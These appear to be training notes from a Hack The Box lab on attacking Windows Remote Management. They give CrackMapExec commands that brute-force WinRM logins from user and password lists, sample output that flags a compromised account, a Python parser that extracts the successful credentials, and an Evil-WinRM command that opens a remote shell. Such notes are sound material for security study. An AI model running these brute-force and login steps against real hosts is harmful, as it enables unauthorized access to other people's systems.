Attacking Network Services

WINRM

Notes and commands for WINRM.

2024-04-01
Tags: passwords, attacking-network-services, winrm

WinRM

  • Ports 5985 and 5986

Installing CrackMapExec (https://github.com/byt3bl33d3r/CrackMapExec):

  • Momothechi@htb[/htb]$ sudo apt-get -y install crackmapexec

Starting and options

  • crackmapexec -h

More information on a specific service (e.g. smb):

  • crackmapexec smb -h

General usage

  • Supply a user and password (or a list of each) with -u and -p:

  • Momothechi@htb[/htb]$ crackmapexec -u <user> -p <password>

  • Example usage:

  • Momothechi@htb[/htb]$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

  • Output:

  • WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)

  • WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman

  • WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)

  • (Pwn3d!) marks a successfully brute-forced user whose credentials we can potentially use to log in.
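As an added example (not part of the original notes), a small Python parser for the CrackMapExec output lines shown above; it picks out the `[+]` credential hits so the hits can be triaged or reported without re-reading raw tool output. It assumes the line layout PROTO HOST PORT HOSTNAME [tag] message, and the sample input below is constructed from the three lines above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the three WINRM lines from the notes above.
SAMPLE_OUTPUT = """\
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\\user:password (Pwn3d!)
"""

# Assumed layout of one output line: PROTO HOST PORT HOSTNAME [tag] message
LINE_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<host>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+"
    r"\[(?P<tag>[*+\-!])\]\s+(?P<msg>.*)$"
)
# A [+] message starts with DOMAIN\user:  (the secret after the colon is not stored)
CRED_RE = re.compile(r"^(?P<domain>[^\\]+)\\(?P<user>[^:]+):")


@dataclass
class CmeEvent:
    proto: str
    host: str
    port: int
    tag: str          # "*" info, "+" success, "-" failure, "!" error
    msg: str
    domain: Optional[str] = None
    user: Optional[str] = None
    pwned: bool = False   # True when the line carries the (Pwn3d!) marker


def parse_line(line: str) -> Optional[CmeEvent]:
    """Parse one output line; return None for lines that do not fit the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = CmeEvent(m["proto"], m["host"], int(m["port"]), m["tag"], m["msg"])
    if ev.tag == "+":
        c = CRED_RE.match(ev.msg)
        if c:
            ev.domain, ev.user = c["domain"], c["user"]
        ev.pwned = ev.msg.endswith("(Pwn3d!)")
    return ev


def valid_credentials(output: str) -> List[CmeEvent]:
    """Return only the [+] events, i.e. the credential hits worth reporting."""
    return [ev for ev in map(parse_line, output.splitlines()) if ev and ev.tag == "+"]
```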

Communicating with the compromised machine once we have a username and password

  • Installing Evil-WinRM:

  • Momothechi@htb[/htb]$ sudo gem install evil-winrm

  • Example usage with the brute-forced username and password:

  • Momothechi@htb[/htb]$ evil-winrm -i 10.129.42.197 -u user -p password